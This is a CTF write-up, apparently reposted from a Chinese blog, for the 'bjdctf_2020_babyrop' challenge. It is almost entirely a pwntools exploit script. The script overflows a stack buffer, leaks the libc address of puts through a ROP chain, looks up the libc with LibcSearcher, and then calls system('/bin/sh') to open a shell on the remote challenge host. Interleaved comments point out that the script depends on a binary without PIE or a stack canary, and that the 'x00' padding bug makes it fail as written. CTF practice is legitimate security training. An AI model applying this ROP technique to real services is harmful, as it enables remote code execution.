bjdctf_2020_babyrop

找不到libc文件  用LibcSearcher模块

from pwn import *
from LibcSearcher import *

# Verbose pwntools logging: every send/recv is echoed to the terminal.
context.log_level='debug'
# Remote challenge instance; the commented-out process() line is the local alternative.
r=remote('node3.buuoj.cn',28426)
#r=process('./bjdctf_2020_babyrop')
elf=ELF('./bjdctf_2020_babyrop')
# Addresses are read directly from the binary and a gadget address is hard-coded
# below, so the script relies on the binary being mapped at a fixed address
# (presumably built without PIE — confirm with checksec). PIE would break this
# stage, and full RELRO would additionally make the GOT read-only.
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main_addr=elf.symbols['main']
# Hard-coded "pop rdi; ret" gadget address from the binary (not computed here).
pop_rdi=0x0000000000400733


# Stage 1: 0x20 bytes of buffer plus 8 bytes of saved rbp precede the return
# address (offsets as given by the author; nothing in this script verifies them).
# Reaching the return address this way presumes no stack canary is in place.
payload='a'*0x20+'b'*0x8
# Call puts(puts@got) to print the resolved libc address of puts, then return to
# main so the program can be driven a second time.
payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.recvuntil('Pull up your sword and tell me u story!')
r.sendline(payload)
r.recv()

# Read the 6 significant bytes of the leaked pointer and zero-extend to 8 bytes.
# NOTE(review): str.ljust requires a single fill character; 'x00' here is three
# characters and raises TypeError — looks like a backslash lost from the original
# post. The str-based payloads also indicate Python 2 pwntools; Python 3 expects bytes.
puts_addr=u64(r.recv(6).ljust(8,'x00'))
# Identify the remote libc from the leaked puts address, since no libc file is
# available locally; LibcSearcher may return several candidates to choose from.
libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
system_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump('str_bin_sh')

# Stage 2: same overflow, this time returning into system("/bin/sh").
payload='a'*0x20+'b'*0x8
payload+=p64(pop_rdi)+p64(bin_addr)+p64(system_addr)
r.recvuntil('Pull up your sword and tell me u story!')
r.sendline(payload)

r.interactive()
       
原文地址:https://www.cnblogs.com/gaonuoqi/p/12312777.html